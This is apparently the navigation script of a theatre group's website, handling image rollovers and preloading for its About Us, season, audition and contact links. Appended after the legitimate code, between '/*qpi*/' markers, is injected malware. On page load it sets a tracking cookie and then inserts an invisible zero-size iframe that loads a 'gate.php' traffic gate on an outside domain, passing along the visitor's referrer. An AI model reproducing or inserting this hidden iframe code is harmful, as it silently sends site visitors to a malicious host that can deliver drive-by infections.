var selectedName='aboutus';
function setCurrent(basename) {

	// Deselect the previous
	oLink=document.getElementById(selectedName+'_link');
	oSpot=document.getElementById(selectedName+'_spotlight');

	oLink.src='final/'+oLink.id+'_off.png';
	oSpot.src='final/'+oSpot.id+'_off.png';

	// Select the new
	selectedName=basename;
	oLink=document.getElementById(selectedName+'_link');
	oSpot=document.getElementById(selectedName+'_spotlight');

	oLink.src='final/'+oLink.id+'_on.png';
	oSpot.src='final/'+oSpot.id+'_on.png';
}
function mover(o) {
	if ((o.id!=selectedName+'_link') && (o.id!=selectedName+'_spotlight')) {
		o.src='final/'+o.id+'_over.png';
	}
}
function mout(o) {
	if ((o.id!=selectedName+'_link') && (o.id!=selectedName+'_spotlight')) {
		o.src='final/'+o.id+'_off.png';
	}
}


var yourImages = new Array(
'final/aboutus_link_off.png','final/aboutus_link__on.png','final/aboutus_link__over.png',
'final/aboutus_spotlight_off.png','final/aboutus_spotlight_on.png','final/aboutus_spotlight_over.png',
'final/ourseason_link_off.png','final/ourseason_link_on.png','final/ourseason_link_over.png',
'final/ourseason_spotlight_off.png','final/ourseason_spotlight_on.png','final/ourseason_spotlight_over.png',
'final/audition_link_off.png','final/audition_link_on.png','final/audition_link_over.png',
'final/audition_spotlight_off.png','final/audition_spotlight_on.png','final/audition_spotlight_over.png',
'final/contactus_link_off.png','final/contactus_link_on.png','final/contactus_link_over.png',
'final/contactus_spotlight_off.png','final/contactus_spotlight_on.png','final/contactus_spotlight_over.png'
);
var preImages = new Array();

function postload() {
	for (i = 0; i < yourImages.length; i++) {
		preImages[i] = new Image();
		preImages[i].src = yourImages[i];
	}

}
/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://zalupka.in/gate/gate.php?f=651722&r='+encodeURI(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
